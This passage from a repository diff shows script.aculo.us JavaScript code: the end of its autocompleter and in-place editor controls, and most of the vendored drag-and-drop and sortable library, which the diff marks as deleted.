this.entryCount = 0;
}
this.stopIndicator();
this.index = 0;
this.render();
}
},
addObservers: function(element) {
Event.observe(element, "mouseover", this.onHover.bindAsEventListener(this));
Event.observe(element, "click", this.onClick.bindAsEventListener(this));
},
onObserverEvent: function() {
this.changed = false;
if(this.getToken().length>=this.options.minChars) {
this.startIndicator();
this.getUpdatedChoices();
} else {
this.active = false;
this.hide();
}
},
getToken: function() {
var tokenPos = this.findLastToken();
if (tokenPos != -1)
var ret = this.element.value.substr(tokenPos + 1).replace(/^\s+/,'').replace(/\s+$/,'');
else
var ret = this.element.value;
return /\n/.test(ret) ? '' : ret;
},
findLastToken: function() {
var lastTokenPos = -1;
for (var i=0; i<this.options.tokens.length; i++) {
var thisTokenPos = this.element.value.lastIndexOf(this.options.tokens[i]);
if (thisTokenPos > lastTokenPos)
lastTokenPos = thisTokenPos;
}
return lastTokenPos;
}
}
Ajax.Autocompleter = Class.create();
Object.extend(Object.extend(Ajax.Autocompleter.prototype, Autocompleter.Base.prototype), {
initialize: function(element, update, url, options) {
this.baseInitialize(element, update, options);
this.options.asynchronous = true;
this.options.onComplete = this.onComplete.bind(this);
this.options.defaultParams = this.options.parameters || null;
this.url = url;
},
getUpdatedChoices: function() {
entry = encodeURIComponent(this.options.paramName) + '=' +
encodeURIComponent(this.getToken());
this.options.parameters = this.options.callback ?
this.options.callback(this.element, entry) : entry;
if(this.options.defaultParams)
this.options.parameters += '&' + this.options.defaultParams;
new Ajax.Request(this.url, this.options);
},
onComplete: function(request) {
this.updateChoices(request.responseText);
}
});
// The local array autocompleter. Used when you'd prefer to
// inject an array of autocompletion options into the page, rather
// than sending out Ajax queries, which can be quite slow sometimes.
//
// The constructor takes four parameters. The first two are, as usual,
// the id of the monitored textbox, and id of the autocompletion menu.
// The third is the array you want to autocomplete from, and the fourth
// is the options block.
//
// Extra local autocompletion options:
// - choices - How many autocompletion choices to offer
//
// - partialSearch - If false, the autocompleter will match entered
// text only at the beginning of strings in the
// autocomplete array. Defaults to true, which will
// match text at the beginning of any *word* in the
// strings in the autocomplete array. If you want to
// search anywhere in the string, additionally set
// the option fullSearch to true (default: off).
//
// - fullSsearch - Search anywhere in autocomplete array strings.
//
// - partialChars - How many characters to enter before triggering
// a partial match (unlike minChars, which defines
// how many characters are required to do any match
// at all). Defaults to 2.
//
// - ignoreCase - Whether to ignore case when autocompleting.
// Defaults to true.
//
// It's possible to pass in a custom function as the 'selector'
// option, if you prefer to write your own autocompletion logic.
// In that case, the other options above will not apply unless
// you support them.
Autocompleter.Local = Class.create();
Autocompleter.Local.prototype = Object.extend(new Autocompleter.Base(), {
initialize: function(element, update, array, options) {
this.baseInitialize(element, update, options);
this.options.array = array;
},
getUpdatedChoices: function() {
this.updateChoices(this.options.selector(this));
},
setOptions: function(options) {
this.options = Object.extend({
choices: 10,
partialSearch: true,
partialChars: 2,
ignoreCase: true,
fullSearch: false,
selector: function(instance) {
var ret = []; // Beginning matches
var partial = []; // Inside matches
var entry = instance.getToken();
var count = 0;
for (var i = 0; i < instance.options.array.length &&
ret.length < instance.options.choices ; i++) {
var elem = instance.options.array[i];
var foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase()) :
elem.indexOf(entry);
while (foundPos != -1) {
if (foundPos == 0 && elem.length != entry.length) {
ret.push("<li><strong>" + elem.substr(0, entry.length) + "</strong>" +
elem.substr(entry.length) + "</li>");
break;
} else if (entry.length >= instance.options.partialChars &&
instance.options.partialSearch && foundPos != -1) {
if (instance.options.fullSearch || /\s/.test(elem.substr(foundPos-1,1))) {
partial.push("<li>" + elem.substr(0, foundPos) + "<strong>" +
elem.substr(foundPos, entry.length) + "</strong>" + elem.substr(
foundPos + entry.length) + "</li>");
break;
}
}
foundPos = instance.options.ignoreCase ?
elem.toLowerCase().indexOf(entry.toLowerCase(), foundPos + 1) :
elem.indexOf(entry, foundPos + 1);
}
}
if (partial.length)
ret = ret.concat(partial.slice(0, instance.options.choices - ret.length))
return "<ul>" + ret.join('') + "</ul>";
}
}, options || {});
}
});
// AJAX in-place editor
//
// see documentation on http://wiki.script.aculo.us/scriptaculous/show/Ajax.InPlaceEditor
// Use this if you notice weird scrolling problems on some browsers,
// the DOM might be a bit confused when this gets called so do this
// waits 1 ms (with setTimeout) until it does the activation
Field.scrollFreeActivate = function(field) {
setTimeout(function() {
Field.activate(field);
}, 1);
}
Ajax.InPlaceEditor = Class.create();
Ajax.InPlaceEditor.defaultHighlightColor = "#FFFF99";
Ajax.InPlaceEditor.prototype = {
initialize: function(element, url, options) {
this.url = url;
this.element = $(element);
this.options = Object.extend({
okButton: true,
okText: "ok",
cancelLink: true,
cancelText: "cancel",
savingText: "Saving...",
clickToEditText: "Click to edit",
okText: "ok",
rows: 1,
onComplete: function(transport, element) {
new Effect.Highlight(element, {startcolor: this.options.highlightcolor});
},
onFailure: function(transport) {
alert("Error communicating with the server: " + transport.responseText.stripTags());
},
callback: function(form) {
return Form.serialize(form);
},
handleLineBreaks: true,
loadingText: 'Loading...',
savingClassName: 'inplaceeditor-saving',
loadingClassName: 'inplaceeditor-loading',
formClassName: 'inplaceeditor-form',
highlightcolor: Ajax.InPlaceEditor.defaultHighlightColor,
highlightendcolor: "#FFFFFF",
externalControl: null,
submitOnBlur: false,
ajaxOptions: {},
evalScripts: false
}, options || {});
if(!this.options.formId && this.element.id) {
this.options.formId = this.element.id + "-inplaceeditor";
if ($(this.options.formId)) {
// there's already a form with that name, don't specify an id
this.options.formId = null;
}
}
if (this.options.externalControl) {
this.options.externalControl = $(this.options.externalControl);
}
this.originalBackground = Element.getStyle(this.element, 'background-color');
if (!this.originalBackground) {
this.originalBackground = "transparent";
}
this.element.title = this.options.clickToEditText;
this.onclickListener = this.enterEditMode.bindAsEventListener(this);
this.mouseoverListener = this.enterHover.bindAsEventListener(this);
this.mouseoutListener = this.leaveHover.bindAsEventListener(this);
Event.observe(this.element, 'click', this.onclickListener);
Event.observe(this.element, 'mouseover', this.mouseoverListener);
Event.observe(this.element, 'mouseout', this.mouseoutListener);
if (this.options.externalControl) {
Event.observe(this.options.externalControl, 'click', this.onclickListener);
Event.observe(this.options.externalControl, 'mouseover', this.mouseoverListener);
Event.observe(this.options.externalControl, 'mouseout', this.mouseoutListener);
}
},
enterEditMode: function(evt) {
if (this.saving) return;
if (this.editing) return;
this.editing = true;
this.onEnterEditMode();
if (this.options.externalControl) {
Element.hide(this.options.externalControl);
}
Element.hide(this.element);
this.createForm();
this.element.parentNode.insertBefore(this.form, this.element);
if (!this.options.loadTextURL) Field.scrollFreeActivate(this.editField);
// stop the event to avoid a page refresh in Safari
if (evt) {
Event.stop(evt);
}
return false;
},
createForm: function() {
this.form = document.createElement("form");
this.form.id = this.options.formId;
Element.addClassName(this.form, this.options.formClassName)
this.form.onsubmit = this.onSubmit.bind(this);
this.createEditField();
if (this.options.textarea) {
var br = document.createElement("br");
this.form.appendChild(br);
}
if (this.options.okButton) {
okButton = document.createElement("input");
okButton.type = "submit";
okButton.value = this.options.okText;
okButton.className = 'editor_ok_button';
this.form.appendChild(okButton);
}
if (this.options.cancelLink) {
cancelLink = document.createElement("a");
cancelLink.href = "#";
cancelLink.appendChild(document.createTextNode(this.options.cancelText));
cancelLink.onclick = this.onclickCancel.bind(this);
cancelLink.className = 'editor_cancel';
this.form.appendChild(cancelLink);
}
},
hasHTMLLineBreaks: function(string) {
if (!this.options.handleLineBreaks) return false;
return string.match(/<br/i) || string.match(/<p>/i);
},
convertHTMLLineBreaks: function(string) {
return string.replace(/<br>/gi, "\n").replace(/<br\/>/gi, "\n").replace(/<\/p>/gi, "\n").replace(/<p>/gi, "");
},
createEditField: function() {
var text;
if(this.options.loadTextURL) {
text = this.options.loadingText;
} else {
text = this.getText();
}
var obj = this;
if (this.options.rows == 1 && !this.hasHTMLLineBreaks(text)) {
this.options.textarea = false;
var textField = document.createElement("input");
textField.obj = this;
textField.type = "text";
textField.name = "value";
textField.value = text;
textField.style.backgroundColor = this.options.highlightcolor;
textField.className = 'editor_field';
var size = this.options.size || this.options.cols || 0;
if (size != 0) textField.size = size;
if (this.options.submitOnBlur)
textField.onblur = this.onSubmit.bind(this);
this.editField = textField;
} else {
this.options.textarea = true;
var textArea = document.createElement("textarea");
textArea.obj = this;
textArea.name = "value";
textArea.value = this.convertHTMLLineBreaks(text);
textArea.rows = this.options.rows;
textArea.cols = this.options.cols || 40;
textArea.className = 'editor_field';
if (this.options.submitOnBlur)
textArea.onblur = this.onSubmit.bind(this);
this.editField = textArea;
}
if(this.options.loadTextURL) {
this.loadExternalText();
}
this.form.appendChild(this.editField);
},
getText: function() {
return this.element.innerHTML;
},
loadExternalText: function() {
Element.addClassName(this.form, this.options.loadingClassName);
this.editField.disabled = true;
new Ajax.Request(
this.options.loadTextURL,
Object.extend({
asynchronous: true,
onComplete: this.onLoadedExternalText.bind(this)
}, this.options.ajaxOptions)
);
},
onLoadedExternalText: function(transport) {
Element.removeClassName(this.form, this.options.loadingClassName);
this.editField.disabled = false;
this.editField.value = transport.responseText.stripTags();
Field.scrollFreeActivate(this.editField);
},
onclickCancel: function() {
this.onComplete();
this.leaveEditMode();
return false;
},
onFailure: function(transport) {
this.options.onFailure(transport);
if (this.oldInnerHTML) {
this.element.innerHTML = this.oldInnerHTML;
this.oldInnerHTML = null;
}
return false;
},
onSubmit: function() {
// onLoading resets these so we need to save them away for the Ajax call
var form = this.form;
var value = this.editField.value;
// do this first, sometimes the ajax call returns before we get a chance to switch on Saving...
// which means this will actually switch on Saving... *after* we've left edit mode causing Saving...
// to be displayed indefinitely
this.onLoading();
if (this.options.evalScripts) {
new Ajax.Request(
this.url, Object.extend({
parameters: this.options.callback(form, value),
onComplete: this.onComplete.bind(this),
onFailure: this.onFailure.bind(this),
asynchronous:true,
evalScripts:true
}, this.options.ajaxOptions));
} else {
new Ajax.Updater(
{ success: this.element,
// don't update on failure (this could be an option)
failure: null },
this.url, Object.extend({
parameters: this.options.callback(form, value),
onComplete: this.onComplete.bind(this),
onFailure: this.onFailure.bind(this)
}, this.options.ajaxOptions));
}
// stop the event to avoid a page refresh in Safari
if (arguments.length > 1) {
Event.stop(arguments[0]);
}
return false;
},
onLoading: function() {
this.saving = true;
this.removeForm();
this.leaveHover();
this.showSaving();
},
showSaving: function() {
this.oldInnerHTML = this.element.innerHTML;
this.element.innerHTML = this.options.savingText;
Element.addClassName(this.element, this.options.savingClassName);
this.element.style.backgroundColor = this.originalBackground;
Element.show(this.element);
},
removeForm: function() {
if(this.form) {
if (this.form.parentNode) Element.remove(this.form);
this.form = null;
}
},
enterHover: function() {
if (this.saving) return;
this.element.style.backgroundColor = this.options.highlightcolor;
if (this.effect) {
this.effect.cancel();
}
Element.addClassName(this.element, this.options.hoverClassName)
},
leaveHover: function() {
if (this.options.backgroundColor) {
this.element.style.backgroundColor = this.oldBackground;
}
Element.removeClassName(this.element, this.options.hoverClassName)
if (this.saving) return;
this.effect = new Effect.Highlight(this.element, {
startcolor: this.options.highlightcolor,
endcolor: this.options.highlightendcolor,
restorecolor: this.originalBackground
});
},
leaveEditMode: function() {
Element.removeClassName(this.element, this.options.savingClassName);
this.removeForm();
this.leaveHover();
this.element.style.backgroundColor = this.originalBackground;
Element.show(this.element);
if (this.options.externalControl) {
Element.show(this.options.externalControl);
}
this.editing = false;
this.saving = false;
this.oldInnerHTML = null;
this.onLeaveEditMode();
},
onComplete: function(transport) {
this.leaveEditMode();
this.options.onComplete.bind(this)(transport, this.element);
},
onEnterEditMode: function() {},
onLeaveEditMode: function() {},
dispose: function() {
if (this.oldInnerHTML) {
this.element.innerHTML = this.oldInnerHTML;
}
this.leaveEditMode();
Event.stopObserving(this.element, 'click', this.onclickListener);
Event.stopObserving(this.element, 'mouseover', this.mouseoverListener);
Event.stopObserving(this.element, 'mouseout', this.mouseoutListener);
if (this.options.externalControl) {
Event.stopObserving(this.options.externalControl, 'click', this.onclickListener);
Event.stopObserving(this.options.externalControl, 'mouseover', this.mouseoverListener);
Event.stopObserving(this.options.externalControl, 'mouseout', this.mouseoutListener);
}
}
};
Ajax.InPlaceCollectionEditor = Class.create();
Object.extend(Ajax.InPlaceCollectionEditor.prototype, Ajax.InPlaceEditor.prototype);
Object.extend(Ajax.InPlaceCollectionEditor.prototype, {
createEditField: function() {
if (!this.cached_selectTag) {
var selectTag = document.createElement("select");
var collection = this.options.collection || [];
var optionTag;
collection.each(function(e,i) {
optionTag = document.createElement("option");
optionTag.value = (e instanceof Array) ? e[0] : e;
if(this.options.value==optionTag.value) optionTag.selected = true;
optionTag.appendChild(document.createTextNode((e instanceof Array) ? e[1] : e));
selectTag.appendChild(optionTag);
}.bind(this));
this.cached_selectTag = selectTag;
}
this.editField = this.cached_selectTag;
if(this.options.loadTextURL) this.loadExternalText();
this.form.appendChild(this.editField);
this.options.callback = function(form, value) {
return "value=" + encodeURIComponent(value);
}
}
});
// Delayed observer, like Form.Element.Observer,
// but waits for delay after last key input
// Ideal for live-search fields
Form.Element.DelayedObserver = Class.create();
Form.Element.DelayedObserver.prototype = {
initialize: function(element, delay, callback) {
this.delay = delay || 0.5;
this.element = $(element);
this.callback = callback;
this.timer = null;
this.lastValue = $F(this.element);
Event.observe(this.element,'keyup',this.delayedListener.bindAsEventListener(this));
},
delayedListener: function(event) {
if(this.lastValue == $F(this.element)) return;
if(this.timer) clearTimeout(this.timer);
this.timer = setTimeout(this.onTimerEvent.bind(this), this.delay * 1000);
this.lastValue = $F(this.element);
},
onTimerEvent: function() {
this.timer = null;
this.callback(this.element, $F(this.element));
}
};

931
js/dragdrop.js vendored
View File

@@ -1,931 +0,0 @@
// Copyright (c) 2005 Thomas Fuchs (http://script.aculo.us, http://mir.aculo.us)
// (c) 2005 Sammi Williams (http://www.oriontransfer.co.nz, sammi@oriontransfer.co.nz)
//
// See scriptaculous.js for full license.
/*--------------------------------------------------------------------------*/
if(typeof Effect == 'undefined')
throw("dragdrop.js requires including script.aculo.us' effects.js library");
var Droppables = {
drops: [],
remove: function(element) {
this.drops = this.drops.reject(function(d) { return d.element==$(element) });
},
add: function(element) {
element = $(element);
var options = Object.extend({
greedy: true,
hoverclass: null,
tree: false
}, arguments[1] || {});
// cache containers
if(options.containment) {
options._containers = [];
var containment = options.containment;
if((typeof containment == 'object') &&
(containment.constructor == Array)) {
containment.each( function(c) { options._containers.push($(c)) });
} else {
options._containers.push($(containment));
}
}
if(options.accept) options.accept = [options.accept].flatten();
Element.makePositioned(element); // fix IE
options.element = element;
this.drops.push(options);
},
findDeepestChild: function(drops) {
deepest = drops[0];
for (i = 1; i < drops.length; ++i)
if (Element.isParent(drops[i].element, deepest.element))
deepest = drops[i];
return deepest;
},
isContained: function(element, drop) {
var containmentNode;
if(drop.tree) {
containmentNode = element.treeNode;
} else {
containmentNode = element.parentNode;
}
return drop._containers.detect(function(c) { return containmentNode == c });
},
isAffected: function(point, element, drop) {
return (
(drop.element!=element) &&
((!drop._containers) ||
this.isContained(element, drop)) &&
((!drop.accept) ||
(Element.classNames(element).detect(
function(v) { return drop.accept.include(v) } ) )) &&
Position.within(drop.element, point[0], point[1]) );
},
deactivate: function(drop) {
if(drop.hoverclass)
Element.removeClassName(drop.element, drop.hoverclass);
this.last_active = null;
},
activate: function(drop) {
if(drop.hoverclass)
Element.addClassName(drop.element, drop.hoverclass);
this.last_active = drop;
},
show: function(point, element) {
if(!this.drops.length) return;
var affected = [];
if(this.last_active) this.deactivate(this.last_active);
this.drops.each( function(drop) {
if(Droppables.isAffected(point, element, drop))
affected.push(drop);
});
if(affected.length>0) {
drop = Droppables.findDeepestChild(affected);
Position.within(drop.element, point[0], point[1]);
if(drop.onHover)
drop.onHover(element, drop.element, Position.overlap(drop.overlap, drop.element));
Droppables.activate(drop);
}
},
fire: function(event, element) {
if(!this.last_active) return;
Position.prepare();
if (this.isAffected([Event.pointerX(event), Event.pointerY(event)], element, this.last_active))
if (this.last_active.onDrop)
this.last_active.onDrop(element, this.last_active.element, event);
},
reset: function() {
if(this.last_active)
this.deactivate(this.last_active);
}
}
var Draggables = {
drags: [],
observers: [],
register: function(draggable) {
if(this.drags.length == 0) {
this.eventMouseUp = this.endDrag.bindAsEventListener(this);
this.eventMouseMove = this.updateDrag.bindAsEventListener(this);
this.eventKeypress = this.keyPress.bindAsEventListener(this);
Event.observe(document, "mouseup", this.eventMouseUp);
Event.observe(document, "mousemove", this.eventMouseMove);
Event.observe(document, "keypress", this.eventKeypress);
}
this.drags.push(draggable);
},
unregister: function(draggable) {
this.drags = this.drags.reject(function(d) { return d==draggable });
if(this.drags.length == 0) {
Event.stopObserving(document, "mouseup", this.eventMouseUp);
Event.stopObserving(document, "mousemove", this.eventMouseMove);
Event.stopObserving(document, "keypress", this.eventKeypress);
}
},
activate: function(draggable) {
window.focus(); // allows keypress events if window isn't currently focused, fails for Safari
this.activeDraggable = draggable;
},
deactivate: function() {
this.activeDraggable = null;
},
updateDrag: function(event) {
if(!this.activeDraggable) return;
var pointer = [Event.pointerX(event), Event.pointerY(event)];
// Mozilla-based browsers fire successive mousemove events with
// the same coordinates, prevent needless redrawing (moz bug?)
if(this._lastPointer && (this._lastPointer.inspect() == pointer.inspect())) return;
this._lastPointer = pointer;
this.activeDraggable.updateDrag(event, pointer);
},
endDrag: function(event) {
if(!this.activeDraggable) return;
this._lastPointer = null;
this.activeDraggable.endDrag(event);
this.activeDraggable = null;
},
keyPress: function(event) {
if(this.activeDraggable)
this.activeDraggable.keyPress(event);
},
addObserver: function(observer) {
this.observers.push(observer);
this._cacheObserverCallbacks();
},
removeObserver: function(element) { // element instead of observer fixes mem leaks
this.observers = this.observers.reject( function(o) { return o.element==element });
this._cacheObserverCallbacks();
},
notify: function(eventName, draggable, event) { // 'onStart', 'onEnd', 'onDrag'
if(this[eventName+'Count'] > 0)
this.observers.each( function(o) {
if(o[eventName]) o[eventName](eventName, draggable, event);
});
},
_cacheObserverCallbacks: function() {
['onStart','onEnd','onDrag'].each( function(eventName) {
Draggables[eventName+'Count'] = Draggables.observers.select(
function(o) { return o[eventName]; }
).length;
});
}
}
/*--------------------------------------------------------------------------*/
var Draggable = Class.create();
Draggable._revertCache = {};
Draggable._dragging = {};
Draggable.prototype = {
initialize: function(element) {
var options = Object.extend({
handle: false,
starteffect: function(element) {
element._opacity = Element.getOpacity(element);
Draggable._dragging[element] = true;
new Effect.Opacity(element, {duration:0.2, from:element._opacity, to:0.7});
},
reverteffect: function(element, top_offset, left_offset) {
var dur = Math.sqrt(Math.abs(top_offset^2)+Math.abs(left_offset^2))*0.02;
Draggable._revertCache[element] =
new Effect.Move(element, { x: -left_offset, y: -top_offset, duration: dur,
queue: {scope:'_draggable', position:'end'}
});
},
endeffect: function(element) {
var toOpacity = typeof element._opacity == 'number' ? element._opacity : 1.0;
new Effect.Opacity(element, {duration:0.2, from:0.7, to:toOpacity,
queue: {scope:'_draggable', position:'end'},
afterFinish: function(){ Draggable._dragging[element] = false }
});
},
zindex: 1000,
revert: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
snap: false // false, or xy or [x,y] or function(x,y){ return [x,y] }
}, arguments[1] || {});
this.element = $(element);
if(options.handle && (typeof options.handle == 'string')) {
var h = Element.childrenWithClassName(this.element, options.handle, true);
if(h.length>0) this.handle = h[0];
}
if(!this.handle) this.handle = $(options.handle);
if(!this.handle) this.handle = this.element;
if(options.scroll && !options.scroll.scrollTo && !options.scroll.outerHTML)
options.scroll = $(options.scroll);
Element.makePositioned(this.element); // fix IE
this.delta = this.currentDelta();
this.options = options;
this.dragging = false;
this.eventMouseDown = this.initDrag.bindAsEventListener(this);
Event.observe(this.handle, "mousedown", this.eventMouseDown);
Draggables.register(this);
},
destroy: function() {
Event.stopObserving(this.handle, "mousedown", this.eventMouseDown);
Draggables.unregister(this);
},
currentDelta: function() {
return([
parseInt(Element.getStyle(this.element,'left') || '0'),
parseInt(Element.getStyle(this.element,'top') || '0')]);
},
initDrag: function(event) {
if(typeof Draggable._dragging[this.element] != undefined &&
Draggable._dragging[this.element]) return;
if(Event.isLeftClick(event)) {
// abort on form elements, fixes a Firefox issue
var src = Event.element(event);
if(src.tagName && (
src.tagName=='INPUT' ||
src.tagName=='SELECT' ||
src.tagName=='OPTION' ||
src.tagName=='BUTTON' ||
src.tagName=='TEXTAREA')) return;
if(Draggable._revertCache[this.element]) {
Draggable._revertCache[this.element].cancel();
Draggable._revertCache[this.element] = null;
}
var pointer = [Event.pointerX(event), Event.pointerY(event)];
var pos = Position.cumulativeOffset(this.element);
this.offset = [0,1].map( function(i) { return (pointer[i] - pos[i]) });
Draggables.activate(this);
Event.stop(event);
}
},
startDrag: function(event) {
this.dragging = true;
if(this.options.zindex) {
this.originalZ = parseInt(Element.getStyle(this.element,'z-index') || 0);
this.element.style.zIndex = this.options.zindex;
}
if(this.options.ghosting) {
this._clone = this.element.cloneNode(true);
Position.absolutize(this.element);
this.element.parentNode.insertBefore(this._clone, this.element);
}
if(this.options.scroll) {
if (this.options.scroll == window) {
var where = this._getWindowScroll(this.options.scroll);
this.originalScrollLeft = where.left;
this.originalScrollTop = where.top;
} else {
this.originalScrollLeft = this.options.scroll.scrollLeft;
this.originalScrollTop = this.options.scroll.scrollTop;
}
}
Draggables.notify('onStart', this, event);
if(this.options.starteffect) this.options.starteffect(this.element);
},
updateDrag: function(event, pointer) {
if(!this.dragging) this.startDrag(event);
Position.prepare();
Droppables.show(pointer, this.element);
Draggables.notify('onDrag', this, event);
this.draw(pointer);
if(this.options.change) this.options.change(this);
if(this.options.scroll) {
this.stopScrolling();
var p;
if (this.options.scroll == window) {
with(this._getWindowScroll(this.options.scroll)) { p = [ left, top, left+width, top+height ]; }
} else {
p = Position.page(this.options.scroll);
p[0] += this.options.scroll.scrollLeft;
p[1] += this.options.scroll.scrollTop;
p.push(p[0]+this.options.scroll.offsetWidth);
p.push(p[1]+this.options.scroll.offsetHeight);
}
var speed = [0,0];
if(pointer[0] < (p[0]+this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[0]+this.options.scrollSensitivity);
if(pointer[1] < (p[1]+this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[1]+this.options.scrollSensitivity);
if(pointer[0] > (p[2]-this.options.scrollSensitivity)) speed[0] = pointer[0]-(p[2]-this.options.scrollSensitivity);
if(pointer[1] > (p[3]-this.options.scrollSensitivity)) speed[1] = pointer[1]-(p[3]-this.options.scrollSensitivity);
this.startScrolling(speed);
}
// fix AppleWebKit rendering
if(navigator.appVersion.indexOf('AppleWebKit')>0) window.scrollBy(0,0);
Event.stop(event);
},
finishDrag: function(event, success) {
this.dragging = false;
if(this.options.ghosting) {
Position.relativize(this.element);
Element.remove(this._clone);
this._clone = null;
}
if(success) Droppables.fire(event, this.element);
Draggables.notify('onEnd', this, event);
var revert = this.options.revert;
if(revert && typeof revert == 'function') revert = revert(this.element);
var d = this.currentDelta();
if(revert && this.options.reverteffect) {
this.options.reverteffect(this.element,
d[1]-this.delta[1], d[0]-this.delta[0]);
} else {
this.delta = d;
}
if(this.options.zindex)
this.element.style.zIndex = this.originalZ;
if(this.options.endeffect)
this.options.endeffect(this.element);
Draggables.deactivate(this);
Droppables.reset();
},
keyPress: function(event) {
if(event.keyCode!=Event.KEY_ESC) return;
this.finishDrag(event, false);
Event.stop(event);
},
endDrag: function(event) {
if(!this.dragging) return;
this.stopScrolling();
this.finishDrag(event, true);
Event.stop(event);
},
draw: function(point) {
var pos = Position.cumulativeOffset(this.element);
var d = this.currentDelta();
pos[0] -= d[0]; pos[1] -= d[1];
if(this.options.scroll && (this.options.scroll != window)) {
pos[0] -= this.options.scroll.scrollLeft-this.originalScrollLeft;
pos[1] -= this.options.scroll.scrollTop-this.originalScrollTop;
}
var p = [0,1].map(function(i){
return (point[i]-pos[i]-this.offset[i])
}.bind(this));
if(this.options.snap) {
if(typeof this.options.snap == 'function') {
p = this.options.snap(p[0],p[1],this);
} else {
if(this.options.snap instanceof Array) {
p = p.map( function(v, i) {
return Math.round(v/this.options.snap[i])*this.options.snap[i] }.bind(this))
} else {
p = p.map( function(v) {
return Math.round(v/this.options.snap)*this.options.snap }.bind(this))
}
}}
var style = this.element.style;
if((!this.options.constraint) || (this.options.constraint=='horizontal'))
style.left = p[0] + "px";
if((!this.options.constraint) || (this.options.constraint=='vertical'))
style.top = p[1] + "px";
if(style.visibility=="hidden") style.visibility = ""; // fix gecko rendering
},
stopScrolling: function() {
if(this.scrollInterval) {
clearInterval(this.scrollInterval);
this.scrollInterval = null;
Draggables._lastScrollPointer = null;
}
},
startScrolling: function(speed) {
if(!(speed[0] || speed[1])) return;
this.scrollSpeed = [speed[0]*this.options.scrollSpeed,speed[1]*this.options.scrollSpeed];
this.lastScrolled = new Date();
this.scrollInterval = setInterval(this.scroll.bind(this), 10);
},
scroll: function() {
var current = new Date();
var delta = current - this.lastScrolled;
this.lastScrolled = current;
if(this.options.scroll == window) {
with (this._getWindowScroll(this.options.scroll)) {
if (this.scrollSpeed[0] || this.scrollSpeed[1]) {
var d = delta / 1000;
this.options.scroll.scrollTo( left + d*this.scrollSpeed[0], top + d*this.scrollSpeed[1] );
}
}
} else {
this.options.scroll.scrollLeft += this.scrollSpeed[0] * delta / 1000;
this.options.scroll.scrollTop += this.scrollSpeed[1] * delta / 1000;
}
Position.prepare();
Droppables.show(Draggables._lastPointer, this.element);
Draggables.notify('onDrag', this);
Draggables._lastScrollPointer = Draggables._lastScrollPointer || $A(Draggables._lastPointer);
Draggables._lastScrollPointer[0] += this.scrollSpeed[0] * delta / 1000;
Draggables._lastScrollPointer[1] += this.scrollSpeed[1] * delta / 1000;
if (Draggables._lastScrollPointer[0] < 0)
Draggables._lastScrollPointer[0] = 0;
if (Draggables._lastScrollPointer[1] < 0)
Draggables._lastScrollPointer[1] = 0;
this.draw(Draggables._lastScrollPointer);
if(this.options.change) this.options.change(this);
},
_getWindowScroll: function(w) {
var T, L, W, H;
with (w.document) {
if (w.document.documentElement && documentElement.scrollTop) {
T = documentElement.scrollTop;
L = documentElement.scrollLeft;
} else if (w.document.body) {
T = body.scrollTop;
L = body.scrollLeft;
}
if (w.innerWidth) {
W = w.innerWidth;
H = w.innerHeight;
} else if (w.document.documentElement && documentElement.clientWidth) {
W = documentElement.clientWidth;
H = documentElement.clientHeight;
} else {
W = body.offsetWidth;
H = body.offsetHeight
}
}
return { top: T, left: L, width: W, height: H };
}
}
/*--------------------------------------------------------------------------*/
var SortableObserver = Class.create();
SortableObserver.prototype = {
initialize: function(element, observer) {
this.element = $(element);
this.observer = observer;
this.lastValue = Sortable.serialize(this.element);
},
onStart: function() {
this.lastValue = Sortable.serialize(this.element);
},
onEnd: function() {
Sortable.unmark();
if(this.lastValue != Sortable.serialize(this.element))
this.observer(this.element)
}
}
var Sortable = {
sortables: {},
_findRootElement: function(element) {
while (element.tagName != "BODY") {
if(element.id && Sortable.sortables[element.id]) return element;
element = element.parentNode;
}
},
options: function(element) {
element = Sortable._findRootElement($(element));
if(!element) return;
return Sortable.sortables[element.id];
},
destroy: function(element){
var s = Sortable.options(element);
if(s) {
Draggables.removeObserver(s.element);
s.droppables.each(function(d){ Droppables.remove(d) });
s.draggables.invoke('destroy');
delete Sortable.sortables[s.element.id];
}
},
create: function(element) {
element = $(element);
var options = Object.extend({
element: element,
tag: 'li', // assumes li children, override with tag: 'tagname'
dropOnEmpty: false,
tree: false,
treeTag: 'ul',
overlap: 'vertical', // one of 'vertical', 'horizontal'
constraint: 'vertical', // one of 'vertical', 'horizontal', false
containment: element, // also takes array of elements (or id's); or false
handle: false, // or a CSS class
only: false,
hoverclass: null,
ghosting: false,
scroll: false,
scrollSensitivity: 20,
scrollSpeed: 15,
format: /^[^_]*_(.*)$/,
onChange: Prototype.emptyFunction,
onUpdate: Prototype.emptyFunction
}, arguments[1] || {});
// clear any old sortable with same element
this.destroy(element);
// build options for the draggables
var options_for_draggable = {
revert: true,
scroll: options.scroll,
scrollSpeed: options.scrollSpeed,
scrollSensitivity: options.scrollSensitivity,
ghosting: options.ghosting,
constraint: options.constraint,
handle: options.handle };
if(options.starteffect)
options_for_draggable.starteffect = options.starteffect;
if(options.reverteffect)
options_for_draggable.reverteffect = options.reverteffect;
else
if(options.ghosting) options_for_draggable.reverteffect = function(element) {
element.style.top = 0;
element.style.left = 0;
};
if(options.endeffect)
options_for_draggable.endeffect = options.endeffect;
if(options.zindex)
options_for_draggable.zindex = options.zindex;
// build options for the droppables
var options_for_droppable = {
overlap: options.overlap,
containment: options.containment,
tree: options.tree,
hoverclass: options.hoverclass,
onHover: Sortable.onHover
//greedy: !options.dropOnEmpty
}
var options_for_tree = {
onHover: Sortable.onEmptyHover,
overlap: options.overlap,
containment: options.containment,
hoverclass: options.hoverclass
}
// fix for gecko engine
Element.cleanWhitespace(element);
options.draggables = [];
options.droppables = [];
// drop on empty handling
if(options.dropOnEmpty || options.tree) {
Droppables.add(element, options_for_tree);
options.droppables.push(element);
}
(this.findElements(element, options) || []).each( function(e) {
// handles are per-draggable
var handle = options.handle ?
Element.childrenWithClassName(e, options.handle)[0] : e;
options.draggables.push(
new Draggable(e, Object.extend(options_for_draggable, { handle: handle })));
Droppables.add(e, options_for_droppable);
if(options.tree) e.treeNode = element;
options.droppables.push(e);
});
if(options.tree) {
(Sortable.findTreeElements(element, options) || []).each( function(e) {
Droppables.add(e, options_for_tree);
e.treeNode = element;
options.droppables.push(e);
});
}
// keep reference
this.sortables[element.id] = options;
// for onupdate
Draggables.addObserver(new SortableObserver(element, options.onUpdate));
},
// return all suitable-for-sortable elements in a guaranteed order
findElements: function(element, options) {
return Element.findChildren(
element, options.only, options.tree ? true : false, options.tag);
},
